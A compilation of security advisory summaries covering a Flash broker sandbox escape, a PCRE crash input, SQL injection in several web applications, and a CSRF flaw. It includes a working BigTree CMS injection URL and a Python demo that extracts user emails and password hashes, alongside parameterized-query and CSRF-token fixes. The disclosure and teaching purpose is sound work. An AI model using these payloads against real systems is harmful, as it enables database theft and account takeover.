FlashBroker – Junction Check Bypass With Locked Directory IE PM Sandbox Escape

FlashBroker is vulnerable to an NTFS junction attack that allows writing an arbitrary file to the filesystem with the user's permissions. The flaw is a faulty check in the FlashBroker BrokerCreateFile and BrokerMoveFileEx methods. FlashBroker opens the destination folder with CreateFile to validate it; if CreateFile fails, the destination is treated as a valid path. Because FlashBroker passes dwShareMode = 0 to CreateFile, the call always fails whenever another process already holds a handle to the destination folder, so an attacker who keeps such a handle open makes the broker skip its check. The PoC writes calc.bat to the Startup folder. It was tested by injecting the DLL into a 32-bit low-integrity IE process with Adobe Flash Player 16.0.0.305 (KB3021953) installed. It does not work in IE11 EPM, because setting up the junction requires normal write access to the temporary folder.

Error in PCRE engine version used in Flash

There is an error in the PCRE engine version used in Flash that allows the execution of arbitrary PCRE bytecode, with potential for memory corruption and RCE. The issue occurs in the handling of zero-length assertions, i.e. assertions where the object of the assertion is prepended with the OP_BRAZERO operator. The simplest test case that crashes an ASAN build is the following: (?(?<a>)?)

WordPress Plugin wp-symposium Unauthenticated SQL Injection Vulnerability

WordPress plugin wp-symposium version 15.5.1 (and probably all earlier versions) suffers from an unauthenticated SQL injection in the 'size' parameter of get_album_item.php. The issue is exploitable even when the plugin is deactivated. The injection makes it trivial to retrieve the entire database contents, including user details and password hashes. An attacker may be able to crack those hashes and log in as the users; if an administrator's password is obtained, the attacker can take complete control of the WordPress installation. The collected information may also enable further attacks.

BigTree CMS 4.2.3: Multiple SQL Injection Vulnerabilities

Various components of the admin area of the BigTree CMS are vulnerable to SQL injection, which can lead to data leaks as well as compromise of the host.

Proof of Concept (show all BigTree users; the injected SELECT supplies the same 10 columns as the original query, and %23 is a URL-encoded # that comments out the rest of the statement):

    http://localhost//BigTree-CMS/site/index.php/admin/pages/view-tree/0' union all select 1,concat(email, ':', password),3,4,5,6,7,8,9,10 from bigtree_users %23/

Code: core/admin/modules/pages/view-tree.php:151; the page id is user controlled:

    $nav_visible = array_merge($admin->getNaturalNavigationByParent($page['id'],1),$admin->getPendingNavigationByParent($page['id']));
    $nav_hidden = array_merge($admin->getHiddenNavigationByParent($page['id']),$admin->getPendingNavigationByParent($page['id'],''));
    $nav_archived = $admin->getArchivedNavigationByParent($page['id']);

core/inc/bigtree/admin.php:2638; $parent is interpolated directly into the query string:

    static function getArchivedNavigationByParent($parent) {
        [...]
        $q = sqlquery("SELECT id,nav_title as title,parent,external,new_window,template,publish_at,expire_at,path,ga_page_views FROM bigtree_pages WHERE parent = '$parent' AND archived = 'on' ORDER BY position DESC");
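The following is an added example and not BigTree's or wp-symposium's own code. It reproduces in Python with SQLite the pattern behind both advisories above: a user-controlled value spliced into the SQL text, followed by a UNION ALL that pulls email and password hash out of the users table, next to the parameterized query that neutralizes the same input. The table layout, rows and hash strings are constructed for the demo (only the column names of the quoted query are taken from the page); the concatenation uses SQLite's || operator and a -- comment where the MySQL PoC uses concat() and # (the %23 in the PoC URL).

```python
import sqlite3


def build_sample_db():
    """Constructed in-memory database: one archived top-level page and two users.
    The password values are placeholder strings, not real hashes."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE bigtree_pages (
            id INTEGER, nav_title TEXT, parent INTEGER, external TEXT, new_window TEXT,
            template TEXT, publish_at TEXT, expire_at TEXT, path TEXT, ga_page_views INTEGER,
            archived TEXT, position INTEGER);
        CREATE TABLE bigtree_users (id INTEGER, email TEXT, password TEXT);
        INSERT INTO bigtree_pages VALUES (5, 'Old page', 0, '', '', 'basic', '', '', 'old', 12, 'on', 1);
        INSERT INTO bigtree_users VALUES (1, 'admin@example.com', '$2y$10$HASH-A');
        INSERT INTO bigtree_users VALUES (2, 'editor@example.com', '$2y$10$HASH-B');
    """)
    return conn


SELECT_COLUMNS = ("SELECT id,nav_title as title,parent,external,new_window,template,"
                  "publish_at,expire_at,path,ga_page_views FROM bigtree_pages ")


def archived_nav_vulnerable(conn, parent):
    """Mirrors getArchivedNavigationByParent: the caller's value becomes part of the SQL text."""
    q = SELECT_COLUMNS + "WHERE parent = '%s' AND archived = 'on' ORDER BY position DESC" % parent
    return conn.execute(q).fetchall()


def archived_nav_safe(conn, parent):
    """Same query with a bound parameter: the value can never change the statement's shape."""
    q = SELECT_COLUMNS + "WHERE parent = ? AND archived = 'on' ORDER BY position DESC"
    return conn.execute(q, (parent,)).fetchall()


# SQLite flavour of the PoC payload: closes the quoted literal, appends a UNION ALL with
# exactly ten columns (matching the original SELECT), and comments out the remainder.
PAYLOAD = "0' union all select 1,email||':'||password,3,4,5,6,7,8,9,10 from bigtree_users --"


def leaked_credentials(conn):
    """Run the payload through the vulnerable function and return the email:hash pairs
    that the injected half of the UNION placed in the 'title' column."""
    rows = archived_nav_vulnerable(conn, PAYLOAD)
    return sorted(r[1] for r in rows if "@" in str(r[1]))


if __name__ == "__main__":
    db = build_sample_db()
    print("vulnerable:", leaked_credentials(db))
    print("safe, same input:", archived_nav_safe(db, PAYLOAD))
    print("safe, real parent:", archived_nav_safe(db, 0))
```

The injected rows come back in the same result set as legitimate navigation entries, which is why the page renders them as if they were page titles. The parameterized version returns nothing for the payload because it is compared as a plain string against the integer parent column.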

CodoForum 3.3.1: Multiple SQL Injection Vulnerabilities

There are two SQL injections in the CodoForum application. One is a blind injection that requires no credentials; the other is a conventional SQL injection that requires the attacker to be authenticated. These vulnerabilities can lead to data leaks as well as compromise of the host.

Privilege Escalation

We can elevate privileges from those of a regular user to Admin level. For the attack to succeed and escalate privileges to Admin, you need to know your own ID for the 'id_usuario' field when executing the attack.

PHPfileNavigator v2.3.3 (pfn) CSRF add arbitrary user accounts

No CSRF token exists when creating user accounts, which allows an attacker to make the application add arbitrary users. The ?PHPSESSID= parameter carried in the URL provides no protection, as its value can be replaced with anything.
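The following is an added example, not PHPfileNavigator's code, showing the synchronizer-token check that the missing protection above would consist of. The handler, session and form structures are hypothetical: a random token is minted once per server-side session, rendered into a hidden field of the add-user form, and a forged cross-site POST, which carries the victim's session cookie but cannot read the token, is rejected before any write happens.

```python
import hmac
import secrets


def issue_csrf_token(session):
    """Mint one random synchronizer token per session and keep it server-side.
    The same value is emitted as a hidden field in every state-changing form."""
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_hex(32)
    return session["csrf_token"]


def csrf_token_valid(session, submitted):
    """True only if the submitted token equals the one stored for this session."""
    expected = session.get("csrf_token")
    if not expected or not submitted:
        return False
    # Constant-time comparison so the check does not leak the token byte by byte.
    return hmac.compare_digest(expected, submitted)


def handle_add_user(session, form, users):
    """Hypothetical 'add user' handler: reject the request unless the token matches."""
    if not csrf_token_valid(session, form.get("csrf_token")):
        return "rejected"
    users.append(form["username"])
    return "created"


def demo():
    """Constructed scenario: an admin's session receives three add-user requests."""
    victim_session = {"user": "admin"}
    users = []
    # 1. An attacker-controlled page auto-submits the form; the browser attaches the
    #    admin's cookie, but the attacker cannot know the token, so the field is absent.
    forged = {"username": "attacker", "password": "x"}
    r1 = handle_add_user(victim_session, forged, users)
    # 2. The legitimate form rendered by the application includes the session's token.
    token = issue_csrf_token(victim_session)
    r2 = handle_add_user(victim_session, {"username": "newuser", "csrf_token": token}, users)
    # 3. A token taken from the attacker's own session does not match the victim's.
    attacker_session = {}
    stolen = issue_csrf_token(attacker_session)
    r3 = handle_add_user(victim_session, {"username": "attacker", "csrf_token": stolen}, users)
    return r1, r2, r3, users


if __name__ == "__main__":
    print(demo())
```

The token must be tied to the server-side session and compared there; a value that only travels in the URL, like the PHPSESSID parameter mentioned above, is visible to and replaceable by the attacker and adds nothing.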
